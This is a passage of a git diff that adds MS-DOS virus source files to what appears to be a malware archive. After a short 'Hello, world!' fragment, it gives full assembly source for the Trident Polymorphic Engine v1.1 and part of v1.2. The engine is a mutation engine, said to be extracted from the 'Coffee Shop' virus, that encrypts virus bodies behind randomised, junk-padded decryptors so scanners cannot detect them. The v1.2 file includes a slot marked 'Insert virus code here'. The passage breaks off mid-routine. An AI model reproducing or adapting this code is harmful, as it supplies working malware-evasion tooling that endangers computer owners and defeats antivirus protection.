+ add dx,10d ;find begin of message
+ mov ah,09 ;print message
+ int 21
+ int 20
+
+ db 'Hello, world!', 0Dh, 0A, '$'
+ db (100d) dup (90)
+
+ end begin
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.tpe-v11.asm b/MSDOS/Virus.MSDOS.Unknown.tpe-v11.asm
new file mode 100644
index 00000000..e6702ac6
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.tpe-v11.asm
@@ -0,0 +1,1028 @@ +.radix 16 + +;============================================================================= +; = +; Trident Polymorphic Engine v1.1 = +; ------------------------------- = +; = +; Dissassembled by: Lucifer Messiah -- ANARKICK SYSTEMS = +; = +; This dissassembly uses as many of the labels from the = +; TPE v1.2 dissassembly as possible, to allow comparison = +; = +;----------------------------------------------------------------------------= +; = +; Trident Polymorphic Engine v1.1 = +; ------------------------------- = +; = +; Input: = +; ES Work Segment = +; DS:DX Code to be encrypted = +; BP Becomes offset of TPE = +; SI Distance to put between decryptor and code = +; CX Length of code to encrypt = +; AX Bit Field Flags: bit 0: DS will not be equal to CS = +; bit 1: insert random instructions = +; bit 2: put junk before decryptor = +; bit 3: Preserve AX with decryptor = +; = +; Output: = +; ES Work Segment (preserved) = +; DS:DX Decryptor + encrypted code = +; BP Start of decryptor (preserved) = +; DI Length of decryptor/offset of encrypted code = +; CX Length of decryptor + encrypted code = +; AX Length of encrypted code = +; = +;============================================================================= + + .model tiny + .code + org 0 + +public rnd_init +public rnd_get +public crypt +public tpe_top +public tpe_bottom + +tpe_top equ $ + db '[ MK / TridenT ]' ;encryptor name + +crypt: + xor di,di + call dword ptr ds:[5652h] ;???? 
+ push cs ;save registers + pop ds + mov byte ptr flags,al + test al,8 + je no_push + mov al,50h + stosb + +no_push: + call rnd_get ;add a few bytes to cx + and ax,1fh + add cx,ax + push cx ;save length of code + call rnd_get ;get random flags + xchg ax,bx + +;--- Flags: ----------------------------------------------- +; +; 0,1 encryption method +; 2,3 which registers to use in encryption engine +; 4 use byte or word for encrypt +; 5 MOV AL, MOV AH, or MOV AX +; 6 MOV CL, MOV CH, or MOV CX +; 7 AX or DX +; 8 count up or down +; 9 ADD/SUB/INC/DEC or CMPSW/SCASW +; A ADD/SUB or INC/DEC +; CMPSW or SCASW +; B offset in XOR instrucion? +; C LOOPNZ or LOOP +; SUB CX or DEC CX +; D carry with crypt ADD/SUB +; E carry with inc ADD/SUB +; F XOR instruction value or AX/DX +; +;---------------------------------------------------------- + +random: + call rnd_get ;get encryption value + or al,al ;is it a 0? + je random ;redo it if it is + mov word ptr xor_val,ax ;store non-zero encryptor + call do_junk ;insert random instructions + pop cx + mov ax,0111h ;make flags to remember which + test bl,20h ; MOV instructions are used + jne z0 + xor al,07 + +z0: + test bl,0ch + jne z1 + xor al,70h + +z1: + test bl,40h + jne z2 + xor ah,7 + +z2: + test bl,10h + jne z3 + and al,73h + +z3: + test bh,80h + jne z4 + and al,70h + +z4: + mov dx,ax + +mov_lup: + call rnd_get ;put MOV instrucions in a + and ax,0fh ; random order + cmp al,0ah + ja mov_lup + mov si,ax ; + push cx ;test if MOV already done + xchg ax,cx + mov ax,1 + shl ax,cl + mov cx,ax + and cx,dx + pop cx + je mov_lup + xor dx,ax ;remember which MOV done + push dx + call do_mov + call do_nop ;insert a random NOP + pop dx + or dx,dx ;all MOVs done? + jne mov_lup + push di ;save start of decryptor loop + call do_add_ax ;ADD AX for loop + call do_nop + test bh,20h ;carry with ADD/SUB? 
+ je no_clc + mov al,0f8h + stosb + +no_clc: + mov word ptr xor_offset,0 + call do_xor ;place all loop instructions + call do_nop + call do_add + pop dx ;get start of decryptor loop + call do_loop + test byte ptr store_mov,8 ;insert POP AX? + je no_pop + mov al,58h + stosb + +no_pop: + xor ax,ax + test bh,01 + je no_pop2 + mov ax,cx + dec ax + test bl,10h + je no_pop2 + and al,0feh + +no_pop2: + add ax,di ;calculate loop offset + add ax,bp + pop si + add ax,si + sub ax,word ptr xor_offset + mov si,word ptr where_len + test bl,0ch ;are BL,BH used for encryption? + jne v2 + mov byte ptr es:[si],al + mov si,word ptr where_len2 + mov byte ptr es:[si],ah + jmp short v3 + +v2: + mov word ptr es:[si],ax + +v3: + mov dx,word ptr xor_val + pop si ;ds:si=start of code + pop ds + push di ;save pointer to start of code + push cx ; and length of encrypted code + test bl,10h ;byte or word? + je blup + inc cx ;cx=# of crypts (words) + shr cx,1 + +lup: + lodsw ;encrypt code (words) + call do_encrypt + stosw + loop lup + jmp short klaar + +blup: + lodsb ;encrypt code (bytes) + xor dh,dh + call do_encrypt + stosb + loop blup + +klaar: + mov cx,di ;cx=lenth decryptor + code + pop ax ;ax=length of decrypted code + pop di ;offset encrypted code + xor dx,dx ;ds:dx=decryptor + cr code + push es + pop ds + retn + +;--- Encrypt the Code ------------------------------------- + +do_encrypt: + add dx,word ptr cs:add_val + test bl,02 + jne lup1 + xor ax,dx + retn + +lup1: + test bl,01 + jne lup2 + sub ax,dx + retn + +lup2: + add ax,dx + retn + +;--- Generate MOV reg,xxxx -------------------------------- + +do_mov: + mov dx,si + mov al,byte ptr ds:mov_byte[si] + cmp dl,04 ;bx? + jne is_not_bx + call add_ind + +is_not_bx: + test dl,0ch ;a*? + pushf + jne is_not_a + test bl,80h ;a* or d*? + je is_not_a + add al,02 + +is_not_a: + call alter ;insert the MOV A* + popf + jne is_not_a2 + mov ax,word ptr ds:xor_val + jmp short sss + +is_not_a2: + test dl,08 ;b*? 
+ jne is_not_b + mov si,offset where_len + test dl,2 + je is_not_bh + add si,2 + +is_not_bh: + mov word ptr [si],di + jmp short sss + +is_not_b: + mov ax,cx ;c*? + test bl,10h ;byte or word encrypt? + je sss + inc ax ;only 1/2 the number of bytes + shr ax,1 + +sss: + test dl,3 ;byte or word register? + je is_x + test dl,2 ;*h? + je is_not_h + xchg ah,al + +is_not_h: + stosb + retn + +is_x: + stosw + retn + +;--- Insert MOV or alternative for MOV -------------------- + +alter: + push bx + push cx + push ax + call rnd_get + xchg ax,bx + pop ax + test bl,3 ;use alternative for MOV? + je no_alter + push ax + and bx,0fh + and al,8 + shl ax,1 + or bx,ax + pop ax + and al,7 + mov cl,9 + xchg ax,cx + mul cl + add ax,30c0h + xchg ah,al + test bl,4 + je no_sub + mov al,28h + +no_sub: + call maybe_2 + stosw + mov al,80h + call maybe_2 + stosb + lea ax,word ptr alt_code + xchg ax,bx + and ax,3 + xlat + add al,cl + +no_alter: + stosb + pop cx + pop bx + retn + +;--- Insert ADD AX,xxxx ----------------------------------- + +do_add_ax: + push cx + lea si,add_val + mov word ptr [si],0 ;save ADD val + mov ax,bx + and ax,8110h + xor ax,8010h + jne no_add_ax ;use ADD? + mov ax,bx + xor ah,ah + mov cl,3 + div cl + or ah,ah + jne no_add_ax ;use ADD? + test bl,80h + jne do_81C2 ;AX or DX? 
+ mov al,5 + stosb + jmp short do_add0 + +do_81C2: + mov ax,0c281h + stosw + +do_add0: + call rnd_get + mov word ptr [si],ax + stosw + +no_add_ax: + pop cx + retn + +;--- generate encryption command -------------------------- + +do_xor: + test byte ptr ds:flags,1 + je no_cs + mov al,2eh ;insert CS: instruction + stosb + +no_cs: + test bh,80h ;type of XOR command + je xor1 + call get_xor + call do_carry + call save_it + xor ax,ax + test bl,80h + je xxxx + add al,10h + +xxxx: + call add_dir + test bh,8 + jne yyyy + stosb + retn + +yyyy: + or al,80h + stosb + call rnd_get + stosw + mov word ptr ds:xor_offset,ax + retn + +xor1: + mov al,80h ;encrypt with value + call save_it + call get_xor + call do_carry + call xxxx + mov ax,word ptr ds:xor_val + test bl,10h + jmp byte_word + +;--- generate increase/decrease command ------------------- + +do_add: + test bl,8 ;no CMPSW/SCASW if BX is used + je da0 + test bh,2 ;ADD/SUB/INC/DEC or CMPSW/SCASW + jne do_cmpsw + +da0: + test bh,4 ;ADD/SUB or INC/DEC? + je add1 + mov al,40h ;INC/DEC + test bh,01 + je add0 + add al,8 + +add0: + call add_ind + stosb + test bl,10h + je return + stosb + +return: + retn + +add1: + test bh,40h ;ADD/SUB + je no_clc2 ;carry? + mov al,0f8h ;insert CLC + stosb + +no_clc2: + mov al,83h + stosb + mov al,0c0h + test bh,01 + je b0627f + mov al,0e8h ;insert XXX + +b0627f: + test bh,40h + je add2 + and al,0cfh + or al,10h + +add2: + call add_ind + stosb + mov al,01 + +save_it: + call add_1 + stosb + retn + +b06293: + test bh,01 + je do_cmpsw + mov al,0fdh ;add XXX + stosb + +do_cmpsw: + test bh,4 ;CMPSE or SCASW? + je normal_cmpsw + test bl,4 ;no SCASW if SI is used + jne do_scasw + +normal_cmpsw: + mov al,0a6h + jmp short save_it + +do_scasw: + mov al,0aeh + jmp short save_it + +;--- generate LOOP command -------------------------------- + +do_loop: + test bh,01 ;no JNE if counting down + jne do_loop2 + call rnd_get + test al,01 + jne cx_loop + +do_loop2: + mov al,0e0h ;LOOPNZ or LOOP? 
+ test bh,1ah ; no LOOPNZ if xor-offset + je l10 ; no LOOPNZ if CMP/SCASW + add al,2 + +l10: + stosb + mov ax,dx + sub ax,di + dec ax + stosb + retn + +cx_loop: + test bh,10h ;SUB CX or DEC CX? + jne cx1_dec + mov ax,0e983h + stosw + mov al,1 + stosb + jmp short do_jne + +cx1_dec: + mov al,49h + stosb + +do_jne: + mov al,75h + jmp short l10 + +;--- add value to AL depending on register type ----------- + +add_dir: + lea si,word ptr dir_change + jmp short xx1 + +add_ind: + lea si,word ptr ind_change + +xx1: + push bx + shr bl,1 + shr bl,1 + and bx,3 + add al,byte ptr [bx+si] + pop bx + retn + +;--- move encyryption command byte to AL ------------------ + +get_xor: + push bx + lea ax,word ptr how_mode + xchg ax,bx + and ax,3 + xlat + pop bx + retn + +;--- change ADD to ADC ------------------------------------ + +do_carry: + test bl,2 ;ADD/SUB used for encryption + je no_ac + test bh,20h + je no_ac + and al,0cfh + or al,10h + +no_ac: + retn + +;--- change AL (byte/word) -------------------------------- + +add_1: + test bl,10h + je add_1_ret + inc al + +add_1_ret: + retn + +;--- change AL (byte/word) -------------------------------- + +maybe_2: + call add_1 ;can't touch this... 
+ cmp al,81h + je maybe_not + push ax + call rnd_get + test al,1 + pop ax + je maybe_not + add al,2 + +maybe_not: + retn + +;--- insert random instructions --------------------------- + +do_nop: + test byte ptr ds: flags,2 + +yes_nop: + je no_nop + call rnd_get + test al,3 + je nop8 + test al,2 + je nop16 + +b0633b equ $+01h + test al,1 + je nop16x + +no_nop: + retn + +;--- insert random nop (or not) --------------------------- + +do_junk: + test byte ptr ds:flags,4 + je no_junk + call rnd_get ;put a random number of + and ax,0fh ; dummy instructions before + inc ax ; decryptor + xchg ax,cx + +junk_loop: + call junk + loop junk_loop + +no_junk: + retn + +junk: + call rnd_get + and ax,01eh + jmp short aa0 + +nop16x: + call rnd_get + and ax,6 + +aa0: + xchg ax,si + call rnd_get + jmp word ptr ds:junk_cals[si] + + +;----------------------------------------------------- + +junk_cals: + dw offset nop16x0 + dw offset nop16x1 + dw offset nop16x2 + dw offset nop16x3 + dw offset nop8 + dw offset nop16 + dw offset junk6 + dw offset junk7 + dw offset junk8 + dw offset junk9 + dw offset junkA + dw offset junkB + dw offset junkC + dw offset junkD + dw offset junkE + dw offset junkF + +;----------------------------------------------------- + +nop16x0: + add byte ptr [si],cl ;J* 0000 (conditional) + jo yes_nop ;jump on overflow + retn + +nop16x1: + mov al,0ebh ;JMP xxxx/junk + and ah,7 + inc ah + stosw + xchg ah,al ;get length of bullshit + cbw ;convert AL to AX + jmp fill_bullshit + +nop16x2: + call junkD ;XCHG AX,reg/XCHG AX,reg + stosb + retn + +nop16x3: + call junkF ;INC/DEC or DEC/INC + xor al,8 + stosb + retn + +nop8: + push bx + and al,7 + lea bx,word ptr nop_data8 + xlat + stosb + pop bx + retn + +nop16: + push bx + and ax,0303h + lea bx,word ptr nop_data16 + xlat + add al,ah + stosb + call rnd_get + and al,7 + mov bl,9 + mul bl + add al,0c0h + stosb + pop bx + retn + +junk6: + push cx + mov al,0e8h + and ah,0fh ;CALL xxxx/junk/POP reg + inc ah + stosw + xor al,al + stosb 
+ xchg ah,al + call fill_bullshit + call do_nop + call rnd_get ;insert POP reg + and al,7 + call no_sp + mov cx,ax + or al,58h + stosb + test ch,3 ;more? + jne junk6_ret + call do_nop + mov ax,0f087h ;insert XCHG SI,reg + or ah,cl + test ch,8 + je j6_1 + mov al,8bh + +j6_1: + stosw + call do_nop + push bx + call rnd_get + xchg ax,bx + and bx,0f7fbh ;insert XOR [SI],xxxx + or bl,8 + call do_xor + pop bx + +junk6_ret: + pop cx + retn + +junk7: + and al,0fh ;MOV reg,xxxx + or al,0b0h + call no_sp + stosb + test al,8 + pushf + call rnd_get + popf + jmp short byte_word + +junk8: + and ah,39h ;DO r/m,r(8,16) + or al,0c0h + call no_sp + xchg ah,al + stosw + retn + +junk9: + and al,3bh ;DO r(8,16),r/m + or al,2 + and ah,3fh + call no_sp2 + call no_bp + stosw + retn + +junkA: + and ah,1 ;DO rm,xxxx + or ax,80c0h + call no_sp + xchg ah,al + stosw + test al,1 + pushf + call rnd_get + popf + jmp short byte_word + +junkB: + call nop8 ;NOP/LOOP + mov ax,0fde2h + stosw + retn + +junkC: + and al,9 ;CMPS* or SCAS* + test ah,1 + je mov_test + or al,0a6h + stosb + retn + +mov_test: + or al,0a0h ;MOV AX,[xxxx] or TEST AX,xxxx + stosb + cmp al,0a8h + pushf + call rnd_get + popf + jmp short byte_word + +junkD: + and al,7 ;XCHG AX,reg + or al,90h + call no_sp + stosb + retn + +junkE: + and ah,7 + or ah,50h + mov al,ah + or ah,8 + stosw + retn + +junkF: + and al,0fh ;INC/DEC + or al,40h + call no_sp + stosb + retn + +;--- store a byte or a word ------------------------------- + +byte_word: + je only_byte + stosw + retn + +only_byte: + stosb + retn + +;--- don't fuck with sp ----------------------------------- + +no_sp: + push ax + and al,7 + cmp al,4 + pop ax + jne no_sp_ret + and al,0fbh + +no_sp_ret: + retn + +;--- don't fuck with sp ----------------------------------- + +no_sp2: + push ax + and ah,38h + cmp ah,20h + pop ax + jne no_sp2_ret + xor ah,20h + +no_sp2_ret: + retn + +;--- don't use [bp + ..] 
---------------------------------- + +no_bp: + test ah,4 + jne no_bp2 + and ah,0fdh + retn + +no_bp2: + push ax + and ah,7 + cmp ah,6 + pop ax + jne no_bp_ret + or ah,1 + +no_bp_ret: + retn + +;--- write byte for JMP/CAL and fill with random bullshit - + +fill_bullshit: + push cx + xchg ax,cx + +bull_lup: + call rnd_get + stosb + loop bull_lup + pop cx + retn + +;--- random number generator ------------------------------ + +rnd_init: + push ax + push cx + call random_init0 + and ax,0h + inc ax + xchg ax,cx + +random_lup: + call rnd_get ;cal random routine a few + loop random_lup ; times to 'warm up' + pop cx + pop ax + retn + +random_init0: + push dx ;initialize generator + push cx + mov ah,2ch + int 21h ;get time CH,CL:DH,DL + in al,40h ;timer + mov ah,al + in al,40h ;timer + xor ax,cx + xor dx,ax + jmp short mov_rnd + +rnd_get: + push dx ;calculate random number + push cx + push bx + in al,40h + +d06502 equ $+01h + add ax,0000h + +d06505 equ $+01h + mov dx,0000h + mov cx,0007h + +rnd_lup: + shl ax,1 + rcl dx,1 + mov bl,al + xor bl,dh + jns rnd_12 + inc al + +rnd_12: + loop rnd_lup + pop bx + +mov_rnd: + mov word ptr cs:d06502,ax + mov word ptr cs:d06505,dx + mov al,dl + pop cx + pop dx + retn + +;----------------------------------------------------- +;.data + +mov_byte db 0b8,0b0,0b4,00 ;AX,AL,AH,.. + db 0b8,0b3,0b7,00 ;BX,GL,GH,.. + db 0b9,0b1,0b5 ;CX,CL,CH + +nop_data8 db 90,0f8,0f9,0f5 ;NOP,CLC,STC,CMC + db 0fa,0fc,45,4dh ;CLI,CLD,INC BP,DEC BP + +nop_data16 db 08,20,84,88 ;OR,AND,XCHG,MOV + +dir_change db 07,07,04,05 ;BL/BH,BX,SI,DI + +ind_change db 03,03,06,07 ;BL/BH,BX,SI,DI + +how_mode db 30,30,00,28 ;XOR,XOR,ADD,SUB + +alt_code dw 0c800h,0c0f0h ;ADD AL,CL,???? + +add_val dw 0 +xor_val dw 0 +xor_offset dw 0 +where_len dw 0 +where_len2 dw 0 +store_mov db 0 +flags db 0 + + db '[TPE 1.1]' + +tpe_bottom equ $ + + end tpe_top + 
diff --git a/MSDOS/Virus.MSDOS.Unknown.tpe-v12.asm b/MSDOS/Virus.MSDOS.Unknown.tpe-v12.asm new file mode 100644 index 00000000..5aadf43a --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tpe-v12.asm 
@@ -0,0 +1,990 @@ + .radix 16 + +;----------------------------------------------------------------------------- +; +; TPE v1.2 Source Code +; -------------------- +; +; Extracted from Coffee Shop virus by: Lucifer Messiah -- ANARKICK SYSTEMS +; +;----------------------------------------------------------------------------- + + .model tiny + .code + +public rnd_init +public rnd_get +public crypt +public tpe_bottom +public tpe_top + +;**************************************************************************** +;* Data area for engine +;**************************************************************************** + + org 0e0 +TPE12: + +add_val dw 0 +xor_val dw 0 +xor_offset dw 0 +where_len dw 0 +where_len2 dw 0 +flags db 0 + + +;**************************************************************************** +;* Begin of virus, installation in memory +;**************************************************************************** + + org 0100 + +;**************************************************************************** +;* Insert virus code here, or compile and link to virus +;**************************************************************************** + + + + + + +;**************************************************************************** +;* +;* Encryption Engine +;* +;* +;* Input: ES work segment +;* DS:DX code to encrypt +;* BP what will be start of decryptor +;* SI what will be distance between decryptor and code +;* CX length of code +;* AX flags: bit 0: DS will not be equal to CS +;* bit 1: insert random instructions +;* bit 2: put junk before decryptor +;* bit 3: preserve AX with decryptor +;* +;* Output: ES: work segment (preserved) +;* DS:DX decryptor + encrypted code +;* BP what will be start of decryptor (preserved) +;* DI length of decryptor / offset of encrypted code +;* CX length of decryptor + encrypted code +;* AX length of encrypted code +;* (other registers may be trashed) +;* 
+;**************************************************************************** + +tpe_top equ $ + db '[ MK / Trident ]' + +crypt: + xor di,di ;di = start of decryptor + push dx ;save offset of code + push si ;save future offset of code + + mov byte ptr ds:[flags],al ;save flags + test al,8 ;push AX? + jz no_push + mov al,50 + stosb + +no_push: call rnd_get ;add a few bytes to cx + and ax,1F + add cx,ax + push cx ;save length of code + + call rnd_get ;get random flags + xchg ax,bx + ;BX flags: + + ;0,1 how to encrypt + ;2,3 which register for encryption + ;4 use byte or word for encrypt + ;5 MOV AL, MOV AH or MOV AX + ;6 MOV CL, MOV CH or MOV CX + ;7 AX or DX + + ;8 count up or down + ;9 ADD/SUB/INC/DEC or CMPSW/SCASW + ;A ADD/SUB or INC/DEC + ; CMPSW or SCASW + ;B offset in XOR instruction? + ;C LOOPNZ or LOOP + ; SUB CX or DEC CX + ;D carry with crypt ADD/SUB + ;E carry with inc ADD/SUB + ;F XOR instruction value or AX/DX + +random: call rnd_get ;get random encryption value + or al,al + jz random ;again if 0 + mov ds:[xor_val],ax + + call do_junk ;insert random instructions + + pop cx + + mov ax,0111 ;make flags to remember which + test bl,20 ; MOV instructions are used + jnz z0 + xor al,07 +z0: test bl,0C + jnz z1 + xor al,70 +z1: test bl,40 + jnz z2 + xor ah,7 +z2: test bl,10 + jnz z3 + and al,73 +z3: test bh,80 + jnz z4 + and al,70 + +z4: mov dx,ax +mov_lup: call rnd_get ;put MOV instructions in + and ax,000F ; a random order + cmp al,0A + ja mov_lup + + mov si,ax + push cx ;test if MOV already done + xchg ax,cx + mov ax,1 + shl ax,cl + mov cx,ax + and cx,dx + pop cx + jz mov_lup + xor dx,ax ;remember which MOV done + + push dx + call do_mov ;insert MOV instruction + call do_nop ;insert a random NOP + pop dx + + or dx,dx ;all MOVs done? + jnz mov_lup + + push di ;save start of decryptor loop + + call do_add_ax ;add a value to AX in loop? + call do_nop + test bh,20 ;carry with ADD/SUB ? 
+ jz no_clc + mov al,0F8 + stosb +no_clc: mov word ptr ds:[xor_offset],0 + call do_xor ;place all loop instructions + call do_nop + call do_add + + pop dx ;get start of decryptor loop + + call do_loop + + test byte ptr ds:[flags],8 ;insert POP AX ? + jz no_pop + mov al,58 + stosb + +no_pop: xor ax,ax ;calculate loop offset + test bh,1 ;up or down? + jz v1 + mov ax,cx + dec ax + test bl,10 ;encrypt with byte or word? + jz v1 + and al,0FE +v1: add ax,di + add ax,bp + pop si + add ax,si + sub ax,word ptr ds:[xor_offset] + mov si,word ptr ds:[where_len] + test bl,0C ;are BL,BH used for encryption? + jnz v2 + mov byte ptr es:[si],al + mov si,word ptr ds:[where_len2] + mov byte ptr es:[si],ah + jmp short v3 +v2: mov word ptr es:[si],ax + +v3: mov dx,word ptr ds:[xor_val] ;encryption value + + pop si ;ds:si = start of code + + push di ;save ptr to encrypted code + push cx ;save length of encrypted code + + test bl,10 ;byte or word? + jz blup + + inc cx ;cx = # of crypts (words) + shr cx,1 + +lup: lodsw ;encrypt code (words) + call do_encrypt + stosw + loop lup + jmp short klaar + + +blup: lodsb ;encrypt code (bytes) + xor dh,dh + call do_encrypt + stosb + loop blup + +klaar: mov cx,di ;cx = length decryptpr + code + pop ax ;ax = length of decrypted code + pop di ;di = offset encrypted code + xor dx,dx ;ds:dx = decryptor + cr. code + push es + pop ds + ret + + +;**************************************************************************** +;* encrypt the code +;**************************************************************************** + +do_encrypt: add dx,word ptr ds:[add_val] + test bl,2 + jnz lup1 + xor ax,dx + ret + +lup1: test bl,1 + jnz lup2 + sub ax,dx + ret + +lup2: add ax,dx + ret + + +;**************************************************************************** +;* generate mov reg,xxxx +;**************************************************************************** + +do_mov: mov dx,si + mov al,byte ptr ds:[si+mov_byte] + cmp dl,4 ;BX? 
+ jne is_not_bx + call add_ind +is_not_bx: test dl,0C ;A*? + pushf + jnz is_not_a + test bl,80 ;A* or D*? + jz is_not_a + add al,2 + +is_not_a: call alter ;insert the MOV + + popf ;A*? + jnz is_not_a2 + mov ax,word ptr ds:[xor_val] + jmp short sss + +is_not_a2: test dl,8 ;B*? + jnz is_not_b + mov si,offset where_len + test dl,2 + jz is_not_bh + add si,2 +is_not_bh: mov word ptr ds:[si],di + jmp short sss + +is_not_b: mov ax,cx ;C* + test bl,10 ;byte or word encryption? + jz sss + inc ax ;only half the number of bytes + shr ax,1 +sss: test dl,3 ;byte or word register? + jz is_x + test dl,2 ;*H? + jz is_not_h + xchg al,ah +is_not_h: stosb + ret + +is_x: stosw + ret + + +;**************************************************************************** +;* insert MOV or alternative for MOV +;**************************************************************************** + +alter: push bx + push cx + push ax + call rnd_get + xchg ax,bx + pop ax + test bl,3 ;use alternative for MOV? + jz no_alter + + push ax + and bx,0F + and al,08 + shl ax,1 + or bx,ax + pop ax + + and al,7 + mov cl,9 + xchg ax,cx + mul cl + + add ax,30C0 + xchg al,ah + test bl,4 + jz no_sub + mov al,28 +no_sub: call maybe_2 + stosw + + mov al,80 + call maybe_2 + stosb + + mov ax,offset add_mode + xchg ax,bx + and ax,3 + xlat + + add al,cl +no_alter: stosb + pop cx + pop bx + ret + + +;**************************************************************************** +;* insert ADD AX,xxxx +;**************************************************************************** + +do_add_ax: push cx + mov si,offset add_val ;save add-value here + mov word ptr ds:[si],0 + mov ax,bx + and ax,8110 + xor ax,8010 + jnz no_add_ax ;use ADD? + + mov ax,bx + xor ah,ah + mov cl,3 + div cl + or ah,ah + jnz no_add_ax ;use ADD? + + test bl,80 + jnz do_81C2 ;AX or DX? 
+ mov al,5 + stosb + jmp short do_add0 +do_81C2: mov ax,0C281 + stosw +do_add0: call rnd_get + mov word ptr ds:[si],ax + stosw +no_add_ax: pop cx + ret + + +;**************************************************************************** +;* generate encryption command +;**************************************************************************** + +do_xor: test byte ptr ds:[flags],1 + jz no_cs + mov al,2E ;insert CS: instruction + stosb + +no_cs: test bh,80 ;type of XOR command + jz xor1 + + call get_xor ;encrypt with register + call do_carry + call save_it + xor ax,ax + test bl,80 + jz xxxx + add al,10 +xxxx: call add_dir + test bh,8 + jnz yyyy + stosb + ret + +yyyy: or al,80 + stosb + call rnd_get + stosw + mov word ptr ds:[xor_offset],ax + ret + +xor1: mov al,080 ;encrypt with value + call save_it + call get_xor + call do_carry + call xxxx + mov ax,word ptr ds:[xor_val] + test bl,10 + jmp byte_word + + +;**************************************************************************** +;* generate increase/decrease command +;**************************************************************************** + +do_add: test bl,8 ;no CMPSW/SCASW if BX is used + jz da0 + test bh,2 ;ADD/SUB/INC/DEC or CMPSW/SCASW + jnz do_cmpsw + +da0: test bh,4 ;ADD/SUB or INC/DEC? + jz add1 + + mov al,40 ;INC/DEC + test bh,1 ;up or down? + jz add0 + add al,8 +add0: call add_ind + stosb + test bl,10 ;byte or word? + jz return + stosb ;same instruction again +return: ret + +add1: test bh,40 ;ADD/SUB + jz no_clc2 ;carry? + mov al,0F8 ;insert CLC + stosb +no_clc2: mov al,083 + stosb + mov al,0C0 + test bh,1 ;up or down? + jz add2 + mov al,0E8 +add2: test bh,40 ;carry? + jz no_ac2 + and al,0CF + or al,10 +no_ac2: call add_ind + stosb + mov al,1 ;value to add/sub +save_it: call add_1 + stosb + ret + +do_cmpsw: test bh,1 ;up or down? + jz no_std + mov al,0FDh ;insert STD + stosb +no_std: test bh,4 ;CMPSW or SCASW? 
+ jz normal_cmpsw + test bl,4 ;no SCASW if SI is used + jnz do_scasw + +normal_cmpsw: mov al,0A6 ;CMPSB + jmp short save_it +do_scasw: mov al,0AE ;SCASB + jmp short save_it + + +;**************************************************************************** +;* generate loop command +;**************************************************************************** + +do_loop: test bh,1 ;no JNE if couting down + jnz loop_loop ; (prefetch bug!) + call rnd_get + test al,1 ;LOOPNZ/LOOP or JNE? + jnz cx_loop + +loop_loop: mov al,0E0 + test bh,1A ;LOOPNZ or LOOP? + jz ll0 ; no LOOPNZ if xor-offset + add al,2 ; no LOOPNZ if CMPSW/SCASW +ll0: stosb + mov ax,dx + sub ax,di + dec ax + stosb + ret + +cx_loop: test bh,10 ;SUB CX or DEC CX? + jnz cxl_dec + mov ax,0E983 + stosw + mov al,1 + stosb + jmp short do_jne + +cxl_dec: mov al,49 + stosb +do_jne: mov al,75 + jmp short ll0 + + +;**************************************************************************** +;* add value to AL depending on register type +;**************************************************************************** + +add_dir: mov si,offset dir_change + jmp short xx1 + +add_ind: mov si,offset ind_change +xx1: push bx + shr bl,1 + shr bl,1 + and bx,3 + add al,byte ptr ds:[bx+si] + pop bx + ret + + +;**************************************************************************** +;* mov encryption command byte to AL +;**************************************************************************** + +get_xor: push bx + mov ax,offset how_mode + xchg ax,bx + and ax,3 + xlat + pop bx + ret + + +;**************************************************************************** +;* change ADD into ADC +;**************************************************************************** + +do_carry: test bl,2 ;ADD/SUB used for encryption? + jz no_ac + test bh,20 ;carry with (encr.) ADD/SUB? 
+ jz no_ac + and al,0CF + or al,10 +no_ac: ret + + +;**************************************************************************** +;* change AL (byte/word) +;**************************************************************************** + +add_1: test bl,10 + jz add_1_ret + inc al +add_1_ret: ret + + +;**************************************************************************** +;* change AL (byte/word) +;**************************************************************************** + +maybe_2: call add_1 + cmp al,81 ;can't touch this + je maybe_not + push ax + call rnd_get + test al,1 + pop ax + jz maybe_not + add al,2 +maybe_not: ret + + +;**************************************************************************** +;* get random nop (or not) +;**************************************************************************** + +do_nop: test byte ptr ds:[flags],2 + jz no_nop +yes_nop: call rnd_get + test al,3 + jz nop8 + test al,2 + jz nop16 + test al,1 + jz nop16x +no_nop: ret + + +;**************************************************************************** +;* Insert random instructions +;**************************************************************************** + +do_junk: test byte ptr ds:[flags],4 + jz no_junk + call rnd_get ;put a random number of + and ax,0F ; dummy instructions before + inc ax ; decryptor + xchg ax,cx +junk_loop: call junk + loop junk_loop +no_junk: ret + + +;**************************************************************************** +;* get rough random nop (may affect register values) +;**************************************************************************** + +junk: call rnd_get + and ax,1E + jmp short aa0 +nop16x: call rnd_get + and ax,06 +aa0: xchg ax,si + call rnd_get + jmp word ptr ds:[si+junkcals] + + +;**************************************************************************** +;* NOP and junk addresses +;**************************************************************************** + +junkcals dw offset nop16x0 + dw offset nop16x1 
+ dw offset nop16x2 + dw offset nop16x3 + dw offset nop8 + dw offset nop16 + dw offset junk6 + dw offset junk7 + dw offset junk8 + dw offset junk9 + dw offset junkA + dw offset junkB + dw offset junkC + dw offset junkD + dw offset junkE + dw offset junkF + + +;**************************************************************************** +;* NOP and junk routines +;**************************************************************************** + +nop16x0: and ax,000F ;J* 0000 (conditional) + or al,70 + stosw + ret + + +nop16x1: mov al,0EBh ;JMP xxxx / junk + and ah,07 + inc ah + stosw + xchg al,ah ;get lenght of bullshit + cbw + jmp fill_bullshit + + +nop16x2: call junkD ;XCHG AX,reg / XCHG AX,reg + stosb + ret + + +nop16x3: call junkF ;INC / DEC or DEC / INC + xor al,8 + stosb + ret + + +nop8: push bx ;8-bit NOP + and al,7 + mov bx,offset nop_data8 + xlat + stosb + pop bx + ret + + +nop16: push bx ;16-bit NOP + and ax,0303 + mov bx,offset nop_data16 + xlat + add al,ah + stosb + call rnd_get + and al,7 + mov bl,9 + mul bl + add al,0C0 + stosb + pop bx + ret + + +junk6: push cx ;CALL xxxx / junk / POP reg + mov al,0E8 + and ah,0F + inc ah + stosw + xor al,al + stosb + xchg al,ah + call fill_bullshit + call do_nop + call rnd_get ;insert POP reg + and al,7 + call no_sp + mov cx,ax + or al,58 + stosb + + test ch,3 ;more? 
